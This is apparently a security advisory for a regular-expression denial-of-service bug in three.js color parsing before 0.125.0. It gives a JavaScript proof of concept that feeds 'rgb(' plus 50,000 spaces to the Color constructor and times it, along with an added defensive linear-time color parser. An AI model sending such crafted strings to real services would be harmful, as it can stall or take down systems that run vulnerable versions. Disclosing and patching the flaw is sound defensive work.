Severity: high

    Regular Expression Denial of Service

    three

    Overview

    three before version 0.125.0 is vulnerable to Regular Expression Denial of Service (ReDoS). The vulnerable code path is the parsing of rgb and hsl color strings, where a crafted string causes the matching regular expression to backtrack excessively.

    POC

    var three = require('three')

    // Builds "rgb(" followed by n spaces and no closing parenthesis, the
    // input shape that makes the color-string regex backtrack.
    function build_blank (n) {
     var ret = "rgb("
     for (var i = 0; i < n; i++) {
      ret += " "
     }

     return ret;
    }

    var Color = three.Color

    // Time the constructor on a 50,000-character input; on a vulnerable
    // version this takes far longer than a normal color string would.
    var time = Date.now();
    new Color(build_blank(50000))
    var time_cost = Date.now() - time;
    console.log(time_cost+" ms")


    Remediation

    Upgrade to version 0.125.0 or later
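    As an added example (not code from three.js or this advisory), the parser below accepts the rgb()/hsl() functional notation with a hand-rolled linear scan instead of a regular expression, so a long run of whitespace like the one in the POC is rejected in constant time at the length check or at the missing parenthesis rather than triggering backtracking; the MAX_COLOR_LEN bound and the normalised return shape are assumptions.

```javascript
// Added example: linear-time rgb()/hsl() parser usable as an input guard.
// MAX_COLOR_LEN is an assumed bound; legitimate colour strings are far shorter.
const MAX_COLOR_LEN = 64;

function isUnsignedDecimal(s) {
  // digits, optionally one '.' followed by at least one digit; no sign, no exponent
  let seenDot = false, digits = 0;
  for (const ch of s) {
    if (ch >= '0' && ch <= '9') { digits++; continue; }
    if (ch === '.' && !seenDot && digits > 0) { seenDot = true; digits = 0; continue; }
    return false;
  }
  return digits > 0;
}

// Returns { model: 'rgb' | 'hsl', values: [0..1, 0..1, 0..1], alpha } or null.
function parseFunctionalColor(str) {
  if (typeof str !== 'string' || str.length > MAX_COLOR_LEN) return null;
  const open = str.indexOf('(');
  if (open < 0 || str[str.length - 1] !== ')') return null;
  const name = str.slice(0, open).trim().toLowerCase();
  const hasAlpha = name.endsWith('a');
  const model = hasAlpha ? name.slice(0, -1) : name;
  if (model !== 'rgb' && model !== 'hsl') return null;
  const parts = str.slice(open + 1, -1).split(',').map((p) => p.trim());
  if (parts.length !== (hasAlpha ? 4 : 3)) return null;
  const values = [];
  for (let i = 0; i < 3; i++) {
    const pct = parts[i].endsWith('%');
    const num = pct ? parts[i].slice(0, -1) : parts[i];
    if (!isUnsignedDecimal(num)) return null;
    const v = Number(num);
    if (model === 'rgb') {
      // rgb channels are 0-255 or 0%-100%, normalised to 0..1
      if (v > (pct ? 100 : 255)) return null;
      values.push(pct ? v / 100 : v / 255);
    } else {
      // hsl: hue is a plain number of degrees (wrapped); saturation and
      // lightness must be percentages
      if (pct !== (i > 0)) return null;
      if (i > 0 && v > 100) return null;
      values.push(i === 0 ? (v % 360) / 360 : v / 100);
    }
  }
  let alpha = 1;
  if (hasAlpha) {
    if (!isUnsignedDecimal(parts[3]) || Number(parts[3]) > 1) return null;
    alpha = Number(parts[3]);
  }
  return { model, values, alpha };
}
```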


    Advisory timeline

    1. published

      Advisory Published
      Mar 1st, 2021
    2. reported

      Reported by Anonymous
      Mar 1st, 2021